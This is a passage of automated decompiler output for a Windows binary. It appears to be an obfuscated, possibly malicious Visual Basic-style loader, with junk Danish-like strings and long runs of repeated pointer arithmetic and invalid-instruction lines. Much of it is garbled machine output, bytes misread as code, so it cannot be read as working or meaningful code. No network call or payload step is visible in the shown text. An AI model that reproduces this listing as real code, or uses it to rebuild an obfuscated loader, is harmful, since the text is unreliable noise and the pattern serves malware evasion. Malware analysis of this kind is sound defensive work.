								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								 *_t785 =  *_t785 + _t785;
								_t97 = _t785 + 2;
								 *_t97 =  *(_t785 + 2) + _t1178;
								__eflags =  *_t97;
								_push(_t785);
								_t786 = _t785 +  *_t785;
								 *_t786 =  *_t786 + 1;
								 *_t786 =  *_t786 + _t786;
								_t787 = _t786 + _t1178;
								 *_t787 =  *_t787 + _t787;
								 *_t787 =  *_t787 + _t787;
								 *_t787 =  *_t787 + _t787;
								 *_t787 =  *_t787 + _t787;
								 *_t787 =  *_t787 + _t787;
								 *_t787 =  *_t787 + _t1144;
								 *_t787 =  *_t787 + _t787;
								__eflags =  *_t787;
								do {
									 *_t787 =  *_t787 + _t787;
									asm("pushad");
									 *_t787 =  *_t787 + _t787;
									_t1178 = _t1178 + _t1144;
									 *_t787 =  *_t787 + _t787;
									 *_t787 =  *_t787 + _t1144;
									 *_t787 =  *_t787 + _t787;
									 *_t787 =  *_t787 + _t787;
									 *_t787 =  *_t787 + _t787;
									asm("adc al, [edx]");
									 *_t787 =  *_t787 + _t787;
									_pop(ds);
									 *_t1209 =  *_t1209 + 1;
									_t787 = _t787 +  *_t787 +  *((intOrPtr*)(_t787 +  *_t787));
									 *_t787 =  *_t787 + _t787;
									 *_t787 =  *_t787 + _t787;
									 *((intOrPtr*)(_t787 - 0x49)) =  *((intOrPtr*)(_t787 - 0x49)) + _t787;
									_push(ds);
									asm("pushad");
									 *(_t1144 - 0x7c6bee30) =  *(_t1144 - 0x7c6bee30) | _t1144;
									 *(_t787 - 0x12efee37) =  *(_t787 - 0x12efee37) + _t787;
									asm("loopne 0x1b");
									asm("in eax, dx");
									_pop(_t1209);
									 *(_t1144 - 0x7c6bee30) =  *(_t1144 - 0x7c6bee30) | _t1144;
									_t107 = _t787 - 0x12efee37;
									 *_t107 =  *(_t787 - 0x12efee37) + _t787;
									__eflags =  *_t107;
									asm("pushad");
								} while ( *_t107 < 0);
								_pop(_t1226);
								 *(_t1144 - 0x7c6bee30) =  *(_t1144 - 0x7c6bee30) | _t1144;
								 *(_t787 - 0x12efee37) =  *(_t787 - 0x12efee37) + _t787;
								asm("daa");
								asm("loopne 0x18");
								asm("lahf");
								_push(0xc40bff3e);
								asm("aam 0x99");
								 *(_t1144 - 0x72) = _t1144;
								__eflags = 0x40;
								asm("xlatb");
								asm("outsd");
								_t790 = (_t787 >> _t1144) +  *0x000000A4;
								 *_t790 =  *_t790 + _t790;
								 *_t790 =  *_t790 + _t790;
								 *0x449A3C31 =  *((intOrPtr*)(0x449a3c31)) + _t790;
								 *_t1204 =  *_t1204 - 1;
								 *_t790 =  *_t790 + _t790;
								 *0xFFFFFFFFF81DB2D3 =  *((intOrPtr*)(0xfffffffff81db2d3)) + 0x68;
								asm("rep insd");
								_t1180 = 0x68 -  *0x2A8AFEB7;
								__eflags = _t790 & 0x0000008e;
								[tword [esp+ecx*4-0x4a] = _t1257;
								asm("cld");
								 *_t1204 =  *_t1204 + _t1226;
								_t791 =  &_a1;
								_t1228 = _t790;
								 *_t791 =  *_t791 + _t791;
								 *_t791 =  *_t791 + _t791;
								asm("o16 pop ss");
								_push(_t1204);
								__eflags =  *_t791 - _t791;
								 *_t791 =  *_t791 + _t791;
								 *_t791 =  *_t791 + _t791;
								 *0x449a3cb1 =  *0x449a3cb1 + 0xd5;
								 *_t791 =  *_t791 + _t791;
								 *0x60 =  *0x60 + _t791;
								 *_t791 =  *_t791 + _t791;
								 *_t791 =  *_t791 + _t791;
								 *_t791 =  *_t791 + _t791;
								 *_t791 =  *_t791 + _t791;
								 *_t1180 =  *_t1180 + _t791;
								 *_t791 =  *_t791 + _t791;
								_t792 = _t791 +  *_t791;
								 *_t1204 =  *_t1204 + _t792;
								 *_t792 =  *_t792 + _t792;
								 *_t792 =  *_t792 + _t792;
								_t793 = _t792 +  *_t792;
								 *0x449a3cb1 =  *0x449a3cb1 + _t793;
								_t794 = _t793 +  *_t793;
								 *_t1204 =  *_t1204 + _t794;
								 *_t794 =  *_t794 + _t794;
								 *_t794 =  *_t794 + _t794;
								_t795 = _t794 +  *_t794;
								 *0x449a3cb1 =  *0x449a3cb1 + _t795;
								_t796 = _t795 +  *_t795;
								 *_t1204 =  *_t1204 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *0x000000D4 =  *0x000000D4 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								 *_t796 =  *_t796 + _t796;
								_t797 = _t796;
								es = es;
								 *_t797 =  *_t797 + _t797;
								 *_t797 =  *_t797 + _t797;
								 *_t797 =  *_t797 + _t797;
								 *_t1180 =  *_t1180 + 0xd5;
								 *_t797 =  *_t797 + _t797;
								 *_t797 =  *_t797 + _t797;
								 *((intOrPtr*)(0xd4 + _t797)) =  *((intOrPtr*)(0xd4 + _t797)) + 0x60;
								 *_t797 =  *_t797 + _t797;
								 *_t797 =  *_t797 + _t797;
								_t798 = _t797 &  *0x000000D4;
								 *_t798 =  *_t798 + _t798;
								_t799 = _t798 &  *0x000000D4;
								__eflags = _t799 & 0x000000fd;
								asm("invalid");
								asm("cmpsd");
								asm("std");
								asm("invalid");
								asm("cmpsb");
								asm("std");
								asm("invalid");
								asm("movsb");
								asm("std");
								asm("invalid");
								asm("movsd");
								asm("std");
								asm("invalid");
								 *0xa2fffffd = _t799;
								asm("std");
								asm("invalid");
								_t800 =  *0x64fffffd;
								 *_t800 =  *_t800 + _t800;
								 *_t1228 =  *_t1228 + _t800;
								 *_t800 =  *_t800 + _t800;
								asm("o16 add [eax], al");
								 *_t1204 =  *_t1204 + _t800;
								 *_t800 =  *_t800 + _t800;
								_push(0x69000000);
								 *_t800 =  *_t800 + _t800;
								 *0x60 =  *0x60 + _t800;
								 *_t800 =  *_t800 + _t800;
								 *0x000000D4 =  *0x000000D4 + 0xd5;
								 *_t800 =  *_t800 + _t800;
								 *_t800 =  *_t800 + _t800;
								 *_t800 =  *_t800 + _t800;
								 *_t1180 =  *_t1180 + 0x60;
								 *_t800 =  *_t800 + _t800;
								 *((intOrPtr*)(_t800 - 0x75)) =  *((intOrPtr*)(_t800 - 0x75)) + _t800;
								asm("sbb al, [ebx]");
								_t801 = _t800 |  *_t800;
								 *_t801 =  *_t801 + _t801;
								_t802 = _t801;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 & _t802;
								 *_t802 =  *_t802 + _t802;
								asm("ror byte [ebx+0xb031a], 0x0");
								 *_t1204 =  *_t1204 + 0x68;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t802 =  *_t802 + _t802;
								 *_t1180 =  *_t1180 + 0x60;
								 *_t802 =  *_t802 + _t802;
								_t803 = _t802 + 0x68;
								_t1137 = _t1180;
								_t1147 = 0xd4 +  *((intOrPtr*)(_t803 + _t803));
								 *_t803 =  *_t803 + _t803;
								__eflags =  *_t803;
								_t1241 = _t1239 - 1 + 1;
								asm("popad");
								if(__eflags == 0) {
									L34:
									 *_t1147 =  *_t1147 + _t803;
									 *_t803 =  *_t803 ^ _t803;
									_push(_t1137);
									_t1147 = _t1147 + 1;
									__eflags = _t1147;
									_push(_t1241 + 1);
									_push(_t1180);
									L35:
									_t1228 =  &_a1;
									_t1204 = _t1204 - 1;
									_t1137 =  &(_t1137[0]);
									_t803 = _t803;
									_t138 =  &_a83;
									 *_t138 = _a83 + _t1147;
									__eflags =  *_t138;
									L36:
									asm("popad");
									if(__eflags == 0) {
										L51:
										_t803 = _t803 + 1;
										 *_t1147 =  *_t1147 + _t803;
										 *_t803 =  *_t803 + _t803;
										_t143 =  &_a64;
										 *_t143 = _a64 + _t1137;
										__eflags =  *_t143;
										L52:
										_t803 = _t803 + 1;
										 *_t803 =  *_t803 + _t803;
										__eflags =  *_t803;
										L53:
										 *_t803 =  *_t803 + _t803;
										_t145 = _t803 + 0x20;
										 *_t145 = _t1137 +  *(_t803 + 0x20);
										__eflags =  *_t145;
										L54:
										_t803 = _t803 + 1;
										 *_t1147 =  *_t1147 + _t803;
										 *_t803 =  *_t803 + _t803;
										_t147 = _t803 + 0x4020;
										 *_t147 =  *(_t803 + 0x4020) + _t803;
										__eflags =  *_t147;
										L55:
										_t803 = _t803 + 1;
										 *_t803 =  *_t803 + _t803;
										__eflags =  *_t803;
										L56:
										 *_t803 =  *_t803 + _t803;
										__eflags =  *_t803;
										L57:
										_t149 = _t803 + 0x40;
										 *_t149 = _t1137 +  *(_t803 + 0x40);
										__eflags =  *_t149;
										L58:
										_t803 = _t803 + 1;
										 *_t1147 =  *_t1147 + _t803;
										 *_t803 =  *_t803 + _t803;
										__eflags =  *_t803;
										L59:
										_t151 = _t803 + 0x28004020;
										 *_t151 =  *(_t803 + 0x28004020) + _t803;
										__eflags =  *_t151;
										L60:
										_t804 = _t803 + 1;
										 *_t804 =  *_t804 + _t1147;
										 *((intOrPtr*)(_t1204 + 0x6c006801)) =  *((intOrPtr*)(_t1204 + 0x6c006801)) + _t1180;
										 *((intOrPtr*)(_t804 + 0x54004020)) =  *((intOrPtr*)(_t804 + 0x54004020)) + _t1147;
										__eflags = _t804 -  *_t1147;
										 *_t804 =  *_t804 + _t804;
										 *_t804 =  *_t804 + _t804;
										asm("rol byte [edi], 0x6b");
										_a630980672 = _a630980672 + _t1147;
										_t805 = _t804 + 1;
										 *_t805 =  *_t805 + _t805;
										_pop(ds);
										 *((intOrPtr*)(_t805 + _t805)) =  *((intOrPtr*)(_t805 + _t805)) + _t1180;
										 *_t805 =  *_t805 + _t805;
										asm("lodsb");
										_t806 = _t805 & 0xffff0040;
										asm("invalid");
										 *_t806 =  *_t806 + _t806;
										 *_t806 =  *_t806 + _t806;
										 *_t806 =  *_t806 + _t806;
										 *_t806 =  *_t806 + _t806;
										_t807 = _t806 - 1;
										 *_t807 =  *_t807 & _t807;
										_t1230 = _t1228 |  *_t1137;
										_t1244 = 0xff004025;
										asm("invalid");
										asm("invalid");
										 *_t807 =  *_t807 & _t807;
										asm("sbb [edx], ah");
										_t808 = _t807 + 1;
										 *0x4c004022 =  *0x4c004022 + _t808;
										_t809 = _t808 &  *_t808;
										__eflags = _t809;
										asm("o16 and al, [eax]");
										if(__eflags < 0) {
											_v1056948190 = _v1056948190 + _t1147;
											asm("invalid");
											asm("cmc");
											asm("sbb al, 0x23");
											 *_t1147 =  *_t1147 + _t1147;
											_pop(_t1230);
											__eflags = _t809;
										}
										if(__eflags <= 0) {
											 *((intOrPtr*)(_t1147 - 0x61ffbfdd)) =  *((intOrPtr*)(_t1147 - 0x61ffbfdd)) + _t1180;
											asm("in al, 0x21");
											 *0xc5004023 =  *0xc5004023 & 0xc5004023;
											_t1244 = _t1244 |  *_t1180;
											 *_t1180 =  &(_t1180[ *_t1180]);
											_t809 = (0xc5004023 &  *0xc5004023) + 2 &  *0xc5004023;
											asm("aas");
										}
										_pop(_t1148);
										 *_t1180 =  *_t1180 & 0x00000040;
										 *((intOrPtr*)(_t1180 - 0x58ffbfde)) =  *((intOrPtr*)(_t1180 - 0x58ffbfde)) + _t1137;
										 *_t1204 =  *_t1204 + _t1148;
										_t1138 =  &(_t1137[0]);
										_t820 = (0x23 &  *0x00000023) +  *_t1137 + 0x00000001 &  *((0x23 &  *0x00000023) +  *_t1137 + 1) &  *[ss:eax] &  *((0x23 &  *0x00000023) +  *_t1137 + 0x00000001 &  *((0x23 &  *0x00000023) +  *_t1137 + 1) &  *[ss:eax]);
										_t822 = (_t820 &  *_t820) + 1;
										_t1138[0x8eac010] = _t1138[0x8eac010] + _t822;
										asm("fbld tword [ebx]");
										_t825 = (_t822 + 0x00000001 &  *(_t822 + 1)) + 1;
										 *_t825 =  *_t825 + _t825;
										 *_t825 =  *_t825 + _t825;
										 *((intOrPtr*)(_t825 + 0x4020)) =  *((intOrPtr*)(_t825 + 0x4020)) + _t825;
										 *_t825 =  *_t825 & _t825;
										_t827 = _t825 + 2;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										 *_t827 =  *_t827 + _t827;
										_t828 = _t827 + _t1138;
										 *_t828 =  *_t828 & _t828;
										asm("xlatb");
										_t829 = _t828 &  *_t828;
										__eflags = _t829;
										_t830 = _t829 + 1;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *_t830 = _t830 +  *_t830;
										 *((intOrPtr*)(_t1148 + 0x3304246c)) =  *((intOrPtr*)(_t1148 + 0x3304246c)) + _t830;
										 *_t830 = _t830 +  *_t830;
										asm("fcmovne st0, st0");
										 *_t830 = _t830 +  *_t830;
										__eflags =  *_t830;
										_t1245 = _t1244 - 0xc;
										 *[fs:0x0] = _t1245;
										L004014F0();
										_v119 = _t1245;
										_v115 = 0x401268;
										_v111 = _v99 & 0x00000001;
										_v99 = _v99 & 0x000000fe;
										 *((intOrPtr*)( *_v99 + 4))(_v99, _t1204, 0xc4004016, _t1138,  *[fs:0x0], 0x4014f6, _t1230, ss, ss, 0x23, _t820);
										__eflags =  *0x41333c;
										if( *0x41333c != 0) {
											_v208 = 0x41333c;
										} else {
											_push(0x41333c);
											_push(0x402774);
											L004016B8();
											_v208 = 0x41333c;
										}
										_t184 =  &_v208; // 0x41333c
										_v184 =  *((intOrPtr*)( *_t184));
										_t845 =  *((intOrPtr*)( *_v184 + 0x14))(_v184,  &_v132);
										asm("fclex");
										_v188 = _t845;
										__eflags = _v188;
										if(_v188 >= 0) {
											_t195 =  &_v212;
											 *_t195 = _v212 & 0x00000000;
											__eflags =  *_t195;
										} else {
											_push(0x14);
											_push(0x402764);
											_push(_v184);
											_push(_v188);
											L004016B2();
											_v212 = _t845;
										}
										_v192 = _v132;
										_t850 =  *((intOrPtr*)( *_v192 + 0x78))(_v192,  &_v136);
										asm("fclex");
										_v196 = _t850;
										__eflags = _v196;
										if(_v196 >= 0) {
											_t208 =  &_v216;
											 *_t208 = _v216 & 0x00000000;
											__eflags =  *_t208;
										} else {
											_push(0x78);
											_push(0x402784);
											_push(_v192);
											_push(_v196);
											L004016B2();
											_v216 = _t850;
										}
										_v36 = _v136;
										L004016AC();
										_v160 =  *0x401264;
										_v156 =  *0x401260;
										_v172 =  *0x401258;
										 *_t1245 =  *0x401254;
										 *((intOrPtr*)( *_a4 + 0x748))(_a4, 0x937, 0x1c4a,  &_v172,  &_v156, 0x1ea6f2,  &_v132, 0x3fc073,  &_v160,  &_v164);
										_v72 = _v164;
										_v140 = 0x23bb;
										_v136 = 0x4c55;
										_t863 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4,  &_v136,  &_v140);
										_v184 = _t863;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t237 =  &_v220;
											 *_t237 = _v220 & 0x00000000;
											__eflags =  *_t237;
										} else {
											_push(0x6f8);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v220 = _t863;
										}
										_v140 = 0x4a54;
										L004016A6();
										L004016A6();
										_v172 = 0x20a09d70;
										_v168 = 0x5afe;
										_v136 = 0xdbf;
										_v156 =  *0x401250;
										 *((intOrPtr*)( *_a4 + 0x74c))(_a4,  &_v156,  &_v136,  &_v172,  &_v124, 0x6a5f8a,  &_v128,  &_v140, L"nonleaded");
										L004016A0();
										_t1246 = _t1245 + 0xc;
										_v160 =  *0x40124c;
										_v140 = 0x3cfc;
										_v136 = 0x4fc;
										_v156 =  *0x401248;
										_t882 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v156,  &_v136,  &_v140, 0x5930, 0x632350f0, 0x5afb,  &_v160, 0x6faf64,  &_v164, 2,  &_v124,  &_v128);
										_v184 = _t882;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t274 =  &_v224;
											 *_t274 = _v224 & 0x00000000;
											__eflags =  *_t274;
										} else {
											_push(0x6fc);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v224 = _t882;
										}
										_v68 = _v164;
										_v136 = 0xa93;
										_v160 =  *0x401244;
										_v156 =  *0x401240;
										_t890 =  *((intOrPtr*)( *_a4 + 0x700))(_a4, 0x4319,  &_v156,  &_v160,  &_v136, 0x534262, L"COORDINATORY", 0xafdb4ec0, 0x5af6,  &_v172);
										_v184 = _t890;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t293 =  &_v228;
											 *_t293 = _v228 & 0x00000000;
											__eflags =  *_t293;
										} else {
											_push(0x700);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v228 = _t890;
										}
										_v100 = _v172;
										_v96 = _v168;
										 *((intOrPtr*)( *_a4 + 0x750))(_a4);
										_v172 = 0xb73d9430;
										_v168 = 0x5afa;
										_v156 = 0x71b51e;
										 *((intOrPtr*)( *_a4 + 0x754))(_a4,  &_v156, 0x646b, L"Rapportopgaveer",  &_v172,  &_v136);
										_v64 = _v136;
										_v156 = 0x19a9ec;
										_v136 = 0x74b1;
										L004016A6();
										_v172 =  *0x401238;
										_t910 =  *((intOrPtr*)( *_a4 + 0x704))(_a4, L"UDSENDELSESLEDERENS", L"Princesslike2",  &_v172, 0x75993920, 0x5b05,  &_v124, 0x7965ca,  &_v136, 0x6c83,  &_v156,  &_v180);
										_v184 = _t910;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t330 =  &_v232;
											 *_t330 = _v232 & 0x00000000;
											__eflags =  *_t330;
										} else {
											_push(0x704);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v232 = _t910;
										}
										_v32 = _v180;
										_v28 = _v176;
										L0040169A();
										L004016A6();
										_v136 = 0x7f6;
										_v160 = 0x85e0a5;
										L004016A6();
										_v156 = 0x81e999;
										 *((intOrPtr*)( *_a4 + 0x758))(_a4, 0x5b262c,  &_v156, 0x4de434a0, 0x5b07,  &_v124, L"Ciceronically",  &_v160,  &_v136,  &_v128,  &_v140);
										_v76 = _v140;
										L004016A0();
										_t1247 = _t1246 + 0xc;
										_t927 =  *((intOrPtr*)( *_a4 + 0x708))(_a4, 2,  &_v124,  &_v128);
										_v184 = _t927;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t363 =  &_v236;
											 *_t363 = _v236 & 0x00000000;
											__eflags =  *_t363;
										} else {
											_push(0x708);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v236 = _t927;
										}
										_v152 = 0x2e49;
										_v172 =  *0x401230;
										_v148 = 0x47eb;
										_v144 = 0x4944;
										_v140 = 0x4cd7;
										_v136 = 0x72a9;
										_t936 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4,  &_v136, 0x20ce,  &_v140,  &_v144, 0x16c328,  &_v148,  &_v172,  &_v152);
										_v184 = _t936;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t385 =  &_v240;
											 *_t385 = _v240 & 0x00000000;
											__eflags =  *_t385;
										} else {
											_push(0x70c);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v240 = _t936;
										}
										_v136 = 0x58da;
										 *((intOrPtr*)( *_a4 + 0x75c))(_a4, L"brysthulernes",  &_v136,  &_v140);
										_v92 = _v140;
										L004016A6();
										L004016A6();
										_t947 =  *((intOrPtr*)( *_a4 + 0x710))(_a4,  &_v124, 0x1ea6f2,  &_v128);
										_v184 = _t947;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t407 =  &_v244;
											 *_t407 = _v244 & 0x00000000;
											__eflags =  *_t407;
										} else {
											_push(0x710);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v244 = _t947;
										}
										L004016A0();
										_t1248 = _t1247 + 0xc;
										L004016A6();
										_v160 = 0x4c041c;
										_v172 = 0x950d78b0;
										_v168 = 0x5af7;
										_t1160 =  &_v124;
										L004016A6();
										_v156 = 0x6b48d8;
										 *_t1248 =  *0x401228;
										 *_t1248 =  *0x401220;
										 *((intOrPtr*)( *_a4 + 0x760))(_a4, _t1160, _t1160,  &_v156,  &_v124, _t1160, _t1160,  &_v172,  &_v160, 0x2df651, 0x6ba0, 0x106f,  &_v128, 2,  &_v124,  &_v128);
										L004016A0();
										_t1249 = _t1248 + 0xc;
										_v156 = 0x4bf5be;
										L004016A6();
										_t1162 =  &_v124;
										L004016A6();
										_v172 = 0x7df0fff0;
										_v168 = 0x5afa;
										 *_t1249 =  *0x401218;
										 *((intOrPtr*)( *_a4 + 0x764))(_a4, 0x55d653,  &_v172, 0x5d62, 0x329d,  &_v124, _t1162, _t1162,  &_v128, L"Neapolitanernes9", L"Femaaret1",  &_v156, 2,  &_v124,  &_v128);
										L004016A0();
										_t1250 = _t1249 + 0xc;
										_v144 = 0x6589;
										_v140 = 0x592a;
										_v136 = 0xc7f;
										_v172 = 0xcd64b2a0;
										_v168 = 0x5b06;
										 *_t1250 =  *0x401210;
										 *_t1250 =  *0x401208;
										 *((intOrPtr*)( *_a4 + 0x768))(_a4, 0x703d9a,  &_v172,  &_v136, 0x25b41f,  &_v140, _t1162, _t1162,  &_v144, _t1162, L"BREGNEMOS",  &_v148, 2,  &_v124,  &_v128);
										_v60 = _v148;
										_v160 =  *0x401200;
										_v172 =  *0x4011f8;
										_v156 = 0x498bfd;
										_t984 =  *((intOrPtr*)( *_a4 + 0x714))(_a4,  &_v156, L"MARMENNILL",  &_v172, 0x3fdd2e,  &_v160,  &_v180);
										_v184 = _t984;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t471 =  &_v248;
											 *_t471 = _v248 & 0x00000000;
											__eflags =  *_t471;
										} else {
											_push(0x714);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v248 = _t984;
										}
										_v112 = _v180;
										_v108 = _v176;
										_v160 =  *0x4011f0;
										_v136 = 0x668f;
										_v156 = 0x61043c;
										_v180 = 0x31a5ae00;
										_v176 = 0x5afc;
										_v172 = 0x85536c70;
										_v168 = 0x5afe;
										 *_t1250 =  *0x4011e8;
										 *((intOrPtr*)( *_a4 + 0x76c))(_a4,  &_v172, _t1162, _t1162,  &_v180, 0x278f,  &_v156, 0x8a7d0750, 0x5aff,  &_v136,  &_v160, 0x4691,  &_v140);
										_v56 = _v140;
										_v156 =  *0x4011e0;
										_t1001 =  *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v156, 0x64817a,  &_v172);
										_v184 = _t1001;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t506 =  &_v252;
											 *_t506 = _v252 & 0x00000000;
											__eflags =  *_t506;
										} else {
											_push(0x718);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v252 = _t1001;
										}
										_v52 = _v172;
										_v160 = 0x4186f1;
										_v144 = 0x7308;
										_v140 = 0x3cf0;
										_v156 = 0x80397e;
										_v136 = 0x67df;
										 *_t1250 =  *0x4011d8;
										_t1009 =  *((intOrPtr*)( *_a4 + 0x71c))(_a4, L"STRUKTURELLES", _t1162, _t1162,  &_v136, 0x7c54d2,  &_v156,  &_v140, 0x4d1ba3,  &_v144, 0x22e85140, 0x5b03,  &_v160);
										_v184 = _t1009;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t528 =  &_v256;
											 *_t528 = _v256 & 0x00000000;
											__eflags =  *_t528;
										} else {
											_push(0x71c);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v256 = _t1009;
										}
										_v156 =  *0x4011d4;
										 *_t1250 =  *0x4011d0;
										_t1014 =  *((intOrPtr*)( *_a4 + 0x720))(_a4, 0x8a636, L"Unimputed7", _t1162,  &_v156,  &_v172);
										_v184 = _t1014;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t541 =  &_v260;
											 *_t541 = _v260 & 0x00000000;
											__eflags =  *_t541;
										} else {
											_push(0x720);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v260 = _t1014;
										}
										_v88 = _v172;
										_v172 =  *0x4011c8;
										_v156 = 0x3f4761;
										 *_t1250 =  *0x4011c0;
										_t549 =  &_v156; // 0x3f4761
										 *_t1250 =  *0x4011b8;
										 *((intOrPtr*)( *_a4 + 0x770))(_a4, 0x4855a1f0, 0x5afc, _t1162, _t1162, _t549, _t1162,  &_v172,  &_v180);
										_v120 = _v180;
										_v160 = 0x161041;
										_v136 = 0x5ce9;
										_v172 = 0x7df0fff0;
										_v168 = 0x5afa;
										_v156 =  *0x4011b0;
										 *_t1250 =  *0x401218;
										_t563 =  &_v156; // 0x3f4761
										 *((intOrPtr*)( *_a4 + 0x774))(_a4, _t563, _t1162, _t1162,  &_v172,  &_v136, 0x65f8fe, 0x26ce, 0x1837,  &_v160);
										_v172 =  *0x4011a8;
										_v156 = 0x61246;
										_t1032 =  *((intOrPtr*)( *_a4 + 0x724))(_a4,  &_v156, L"mindedigtet",  &_v172);
										_v184 = _t1032;
										__eflags = _v184;
										if(_v184 >= 0) {
											_t579 =  &_v264;
											 *_t579 = _v264 & 0x00000000;
											__eflags =  *_t579;
										} else {
											_push(0x724);
											_push(0x40259c);
											_push(_a4);
											_push(_v184);
											L004016B2();
											_v264 = _t1032;
										}
										_t1036 =  *((intOrPtr*)( *_a4 + 0x728))(_a4,  &_v136);
										_v184 = _t1036;
										__eflags = _v184;
